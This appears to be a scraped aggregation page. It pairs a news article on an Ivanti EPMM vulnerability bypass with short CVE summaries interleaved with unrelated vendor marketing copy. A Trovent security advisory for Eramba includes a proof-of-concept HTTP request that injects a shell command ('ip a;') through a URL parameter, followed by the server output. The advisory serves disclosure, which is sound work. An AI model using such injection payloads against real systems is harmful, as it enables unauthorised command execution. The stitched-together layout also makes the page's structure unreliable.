Cybersecurity researchers have discovered a bypass for a recently fixed actively exploited vulnerability in some versions of Ivanti Endpoint Manager Mobile (EPMM), prompting Ivanti to urge users to update to the latest version of the software.
Tracked as CVE-2023-35082 (CVSS score: 10.0) and discovered by Rapid7, the issue "allows unauthenticated attackers to access the API in older unsupported

Vulnerability / Software Security

Cybersecurity researchers have discovered a bypass for a recently fixed actively exploited vulnerability in some versions of Ivanti Endpoint Manager Mobile (EPMM), prompting Ivanti to issue a new round of patches.

Tracked as **CVE-2023-35082** (CVSS score: 10.0) and discovered by Rapid7, the issue "allows unauthenticated attackers to access the API in older unsupported versions of MobileIron Core (11.2 and below)."

"If exploited, this vulnerability enables an unauthorized, remote (internet-facing) actor to potentially access users' personally identifiable information and make limited changes to the server," Ivanti said in an advisory released on August 2, 2023.

Rapid7 security researcher Stephen Fewer said, "CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application's security filter chain."

With the latest disclosure, Ivanti has patched a total of three security flaws impacting its EPMM product in quick succession within a span of two weeks.

It also comes as cybersecurity agencies from Norway and the U.S. revealed that CVE-2023-35078 and CVE-2023-35081 have been exploited by unnamed nation-state groups at least since April 2023 to drop web shells and gain persistent remote access to compromised systems.

*   **CVE-2023-35078** (CVSS score: 10.0) - An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.
*   **CVE-2023-35081** (CVSS score: 7.2) - A path traversal vulnerability is discovered in Ivanti EPMM that allows an attacker to write arbitrary files onto the appliance.

While there is no evidence of active exploitation of CVE-2023-35082 in the wild, it's recommended that users upgrade to the latest supported version to secure against potential threats.

"MobileIron Core 11.2 has been out of support since March 15, 2022," Ivanti said. "Therefore, Ivanti will not be issuing a patch or any other remediations to address this vulnerability in 11.2 or earlier versions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Discover Bypass for Recently Patched Critical Ivanti EPMM Vulnerability

A remote command execution (RCE) vulnerability in NextGen Mirth Connect v4.3.0 allows attackers to execute arbitrary commands on the hosting server.

NextGen Healthcare

Ranked #1 EHR and PM by Black Book Research

The Electronic Health Records and Practice Management (PM) by NextGen Healthcare were top ranked by independent healthcare analyst firm Black Book Research for the sixth consecutive year. NextGen Healthcare was ranked #1 EHR in 6–10, 11–25 and 26–99 Physician Groups (All Specialties) and #1 PM solution in all Physician Groups with 6–99 providers in the 2023 Ambulatory EHR PM User Survey.

Read More

**What problem can we help you solve?**

**Practice size**

**My biggest challenge is**

Get Started

**Learn more about what we do****Our integrated platform increases productivity, improves financial outcomes, eases information exchange, and enriches the patient experience.**

*   *   Streamline and customize workflows
    *   Improve care team collaboration
    *   Document with Mobile and gain more face time with patients
    *   Stay current with regulatory requirements
    
*   *   Improve patient engagement
    *   Decrease staff time spent on tedious tasks
    *   Deliver care conveniently with telehealth
    *   Enable direct connections with patients
    
*   *   Target higher-risk patients to close gaps in care
    *   Identify patients with potential to impact outcomes
    *   Coordinate care with seamless communication Identify fee-for-service revenue opportunities
    
*   *   Exchange meaningful information securely
    *   Connect disparate systems to any device
    *   Access data from other providers, organizations and EHRs
    *   Support the latest interoperability and align with Meaningful Use
    
*   *   Provide better check-in and billing
    *   Automate charge creation
    *   Ensure clean claims and reduce denials
    *   Monitor performance and gain insights
    

NextGen Office

Small practices

An all-in-one solution to run your practice so you can focus on care. Practice the way you want with an award-winning, cloud-based EHR that includes a practice management platform and a patient portal.

Learn more

NextGen Enterprise

Mid-size to enterprise practices

A powerhouse EHR solution that’s scalable and adaptable to suit your specialty, workflow, and preferences. With robust specialty-specific clinical content, best-in-class practice management, advanced analytics, RCM, Clearinghouse, patient engagement, and mobile documentation, we’ve got you covered.

Learn more

Experience the benefits of one system, one partner

An EHR system that works seamlessly across the entire organization—EHR, practice management (PM), interoperability, patient self-scheduling, virtual visits, check-in, examination, documentation, check-out, billing, etc. is ideal.

Clinical templates for 26 specialties

Designed with all the productivity tools and reporting capabilities providers need, we have pre-built clinical content for 26 specialties to help you achieve better outcomes. Plus, you can configure the templates to your heart’s delight.

A virtual front door

People expect an excellent digital experience to connect with your practice. Our solutions make it easy for your patients to communicate with your practice, schedule appointments, access their medical records, complete forms, and pay their bills.

Care for your community

Manage the care of your community with a powerful population health solution. Our user-friendly population health solutions sync with your EHR, provide risk stratification of your patient population, help identify gaps in care, and support patient outreach.

A Mobile EHR

With a mobile extension of your practice, you give providers an easier way to work, from anywhere. The access enabled by a mobile EHR means you can treat patients anywhere—and all documentation flows into the patient chart automatically.

The right data now

Securely exchange health information and connect disparate systems across a patient’s entire spectrum of care, easily. Better interoperability is defined by capabilities that boost speed, security, cost-effectiveness, and compliance. Get the data you need when and where you need it.

Secure hosting with AWS

Focus on patient care, not IT management. Scalable, cloud-based hosting services can help reduce the burden of health IT maintenance, speed implementations, simplify upgrades, and cut technology costs. Amazon Web Services (AWS) offer world-class security capabilities and system performance.

People are loving NextGen Healthcare

Hear what our clients have to say about us

****Our clients are making healthcare better****

Everything we do is with our clients in mind. Our solutions are driven by our clients’ input, designed with their needs at the center. Every decision we make is to help our clients become more successful, to improve their clinical and financial outcomes, and to strengthen the health of their communities. We are grateful for our clients every day, in every corner of this company.

We needed a solution that offers meaningful insights to support and sustain our growth. An added benefit of this fluid functionality and connectivity is that it streamlines processes for our staff and provides a better work/life balance for our doctors.

CMO Morris Heights Health Center

Related Content

Learn more about NextGen Healthcare solutions

****The results speak for themselves****

Our solutions have garnered many accolades, but we’re most proud of improving the lives of patients and providers. We continue to develop innovations that help make healthcare better for everyone.

Ready to upgrade your practice?

Make the switch to NextGen Healthcare

CVE-2023-37679: NextGen Healthcare

Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext.

Join the ranks of the largest and most competitive legal and professional service firms that don't leave the question of "where did my time go" to memory or chance.

KnowMore by Element55 automatically captures time and delivers the report back to the professional or the assistant in a simple, secure, private report. No Big Brother here.

Whether from desktop, laptop, remote access (yes, Citrix too), mobile, calendar, office phone, dictation - wherever they work, the information is captured for them, cross-referenced. and delivered by email, web, mobile app - or even paper, if that's how they'll read it!

CVE-2023-39144: It Just Did It For Me Time Capture

In WS-Inc J WBEM Server 4.7.4 before 4.7.5, the CIM-XML protocol adapter does not disable entity resolution. This allows context-dependent attackers to read arbitrary files or cause a denial of service, a similar issue to CVE-2013-4152.

**Welcome to WS**

WS develops, licenses and supports software infrastructure and tools for the development, management and validation of standards-based management technologies including the Common Information Model (CIM), Web-Based Enterprise Management (WBEM), the Common Diagnostic Model (CDM), the Desktop and mobile Architecture for System Hardware (DASH) Initiative, the Systems Management Architecture for Server Hardware (SMASH) Initiative, the Storage Management Initiative (SMI), Web Services for Management (WS-Management) and others for IT Professionals, Data Center Managers, Vendors, and OEM's.

WS offers many Professional Services for both short term and long term projects, including Architecture, Client Development, Customized Development Tools, Customized Services/API's, Model Development, Provider Development, and Training. Our various Professional Services teams have years of expertise to help accelerate your project, and are recognized industry experts. Please contact Sales and let us know how we can help you.

CVE-2023-37364: WS Inc. | Home

In the Keyfactor EJBCA before 8.0.0, the RA web certificate distribution servlet /ejbca/ra/cert allows partial denial of service due to an authentication issue. In configurations using OAuth, disclosure of CA certificates (attributes and public keys) to unauthenticated or less privileged users may occur.

 

**Unlock trust.  
Unlock everything.**

Keyfactor delivers identity-first security for every device, workload, and thing. Because when you establish digital trust, great things happen.

Great companies trust Keyfactor.

**When everything is connected,  
everything has to be trusted.**

More devices. More workloads. More transactions. Digital trust has never  
been so vital—or so complex. But do it right, and you won’t just boost security;  
you’ll get unmatched agility, control, and scalability. That’s where we come in.

IDENTIFY

**Powerful, highly scalable  
PKI for enterprise or IoT.**

Seamlessly issue and manage trusted  
identities—for every machine and person.

The easily scalable, open-source version  
of Keyfactor’s PKI platform.

MANAGE

**Visibility, control, and  
automation for IoT and  
machine IDs.**

Discover and automate your PKI and  
digital certificates from one platform.

Manage all of your IoT device identities—  
at scale—from a single place.

SIGN

**Fast, secure, and flexible  
signing solutions.**

Easily protect keys and sign code with  
native tools.

Automatically sign code and documents  
fast with APIs.

**Find Your Digital Trust**

**loT**

Embed each device with a trusted and unique identity at design, then keep it secure throughout the product lifecycle.

**Enterprise IT**

Establish digital trust across enterprise and multi-cloud environments with trusted PKI and machine identity automation.

**Webinar****Integrating Secure Code Signing in the CI/CD Pipeline**

Watch

**Whitepaper****Five Guiding Tenets for IoT Security**

Read More

**Report****Emerging Trends in Cryptography for 2022**

Read More

**“PKI is an absolute foundational piece to what we’re building. Without EJBCA, we couldn’t have what we have. It is a key pillar to the future of our products.”****Jason Slack****Director of Engineering**

Read Case Study

**“We went from 2,000 certificates to more than 350,000 certificates. That’s a lot to keep track of, but Keyfactor helps us keep everything in view and it’s allowed us to scale massively.”****Joshua Nash****Technology Manager and SVP for Security Engineering**

Read Case Study

**“Sometimes it was difficult to get things working right away or to deploy it on EJBCA. But every time we had an issue, Keyfactor and Red Hat helped us to solve it. It was a very productive relationship.”****Rufus Buschart****Head of PKI at Siemens**

Read Case Study

**“Certificates would expire, but we wouldn’t know until systems went down. Since deploying Keyfactor, we’ve eliminated these incidents entirely.”****David Yu****VP of Security Architecture**

Read Case Study

**“PKI is an absolute foundational piece to what we’re building. Without EJBCA, we couldn’t have what we have. It is a key pillar to the future of our products.”****Jason Slack****Director of Engineering**

Read Case Study

**“We went from 2,000 certificates to more than 350,000 certificates. That’s a lot to keep track of, but Keyfactor helps us keep everything in view and it’s allowed us to scale massively.”****Joshua Nash****Technology Manager and SVP for Security Engineering**

Read Case Study

**“Sometimes it was difficult to get things working right away or to deploy it on EJBCA. But every time we had an issue, Keyfactor and Red Hat helped us to solve it. It was a very productive relationship.”****Rufus Buschart****Head of PKI at Siemens**

Read Case Study

**“Certificates would expire, but we wouldn’t know until systems went down. Since deploying Keyfactor, we’ve eliminated these incidents entirely.”****David Yu****VP of Security Architecture**

Read Case Study

**Keyfactor by the Numbers**

**90 %**

Support Satisfaction

**4.6 **

G2 Reviews

**Ready to try  
Keyfactor?**

CVE-2023-34196: Home

An access control issue in ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to arbitrarily close and open the doors managed by the platform remotely via sending a crafted web request.

**Disclosure Policy**

Team82 is committed to privately reporting vulnerabilities to affected vendors in a coordinated, timely manner in order to ensure the safety of the cybersecurity ecosystem worldwide. To engage with the vendor and research community, Team82 invites you to download and share our Coordinated Disclosure Policy. Team82 will adhere to this reporting and disclosure process when we discover vulnerabilities in products and services.

**Public Email & PGP Key**

Team82 has also made its public PGP Key available for the vendor and research community to securely and safely exchange vulnerability and research information with us.

CVE-2023-38958: CVE-2023-38958

An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.

**Authenticated remote code execution in Eramba****Overview**

Advisory ID: TRSA-2303-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2303-01  
Affected product: Eramba  
Affected version: 3.19.1 (Enterprise and Community edition)  
Vendor: Eramba Limited, https://www.eramba.org  
Credits: Trovent Security GmbH, Sergey Makarov

**Detailed description**

Eramba is a web application for managing Governance, Risk, and Compliance (GRC).  
Trovent Security GmbH discovered that the Eramba web application allows remote code execution for authenticated users.  
A possible attacker is able to modify the parameter “path” in the URL “https://hostname/settings/download-test-pdf?path=” to execute arbitrary commands in the context of the user account the application is running in.  
To see the output of the executed command in the HTTP response, debug mode has to be enabled.

Severity: High  
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE ID: CVE-2023-36255  
CWE ID: CWE-94

**Proof of concept**

HTTP request:

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: \[redacted\]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://\[redacted\]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: \*
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER\_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid\_lft forever preferred\_lft forever
    inet6 ::1/128 scope host
       valid\_lft forever preferred\_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER\_UP&gt; mtu 1500 qdisc fq\_codel state UP group default qlen 1000
    link/ether \[redacted\] brd ff:ff:ff:ff:ff:ff
    inet \[redacted\] brd \[redacted\] scope global ens33
       valid\_lft forever preferred\_lft forever
    inet6 \[redacted\] scope link
       valid\_lft forever preferred\_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp\_snappy6426d4231040e1.91046751.html'
'/tmp/knp\_snappy6426d423104587.46971034.pdf'. </title>

\[...\]

**Solution / Workaround**

The vendor released a fixed version of Eramba.

Fixed in version 3.19.2.

**History**

2023-03-31: Vulnerability found  
2023-04-04: Vendor contacted  
2023-04-17: Vendor confirmed vulnerability  
2023-04-20: Vendor released fixed version  
2023-05-25: Trovent verified remediation of the vulnerability  
2023-06-13: CVE ID requested  
2023-07-28: CVE ID received  
2023-08-01: Advisory published

CVE-2023-36255: Security Advisory 2303-01 - Trovent Security GmbH

Control ID IDSecure 4.7.26.0 and prior uses a hardcoded cryptographic key in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.

The iDSecure solution, developed by Control iD, is a software that enables controlling the access of people and vehicles in companies of all sizes.

All management is performed via a web browser and is compatible with the main operating systems and devices (cell phones, tablets and PCs).

The platform enables the configuration of custom access rules and the generation of detailed reports to make your operation easier and more intuitive.

*   Customizable access rules
*   Offline contingency mode
*   100% web, accessed by web browser
*   Integration with cameras (CCTV)
*   Real-time monitoring
*   Customizable reports
*   Modern interface

**Easy to use**

The iDSecure solution was developed with a focus on usability, making the experience of the manager and security professional as intuitive as possible. The local installation of the software combined with the 100% web interface allows the use of any device to manage access.

**Access rules and reports**

The configuration of complex rules based on companies, groups, schedules, types (visitor, third party, resident, etc.) combined with double-entry control, credits and even random searches, guaran- tee the system’s compatibility with the most advanced security requirements.

**Connectivity e integration**

All Control iD access controllers (e.g., iDAccess, iDBox, iDFace and iDBlock) are natively integrated with iDSecure and can be managed easily. In addition, the system allows integration with CCTV cameras and card and/or biometrics registers for PC.

**A version for every need**

In the entry version of iDSecure (Lite), rules validation is done locally on the access control devices. In the Enterprise version, both identification and validation of rules takes place on the server, allowing an unlimited (depending on purchased license) number of users.

**Documents**

*   **iDSecure software download** iDSecure On-Premises  
    
*   **Manual** iDSecure User Manual  
    
*   **PDF documents** Datasheet iDSecure On-Premises

CVE-2023-33371: Access Control Software iDSecure On-Premises| Control iD

All versions prior to 9.1.4 of Advantech WebAccess/SCADA are vulnerable to use of untrusted pointers. The RPC arguments the client sent client could contain raw memory pointers for the server to use as-is. This could allow an attacker to gain access to the remote file system and the ability to execute commands and overwrite files.

CVE-2023-1437

SpiderControl SCADA Webserver versions 2.08 and prior are vulnerable to path traversal. An attacker with administrative privileges could overwrite files on the webserver using the HMI's upload file feature. This could create size zero files anywhere on the webserver, potentially overwriting system files and creating a denial-of-service condition.

Tag

#web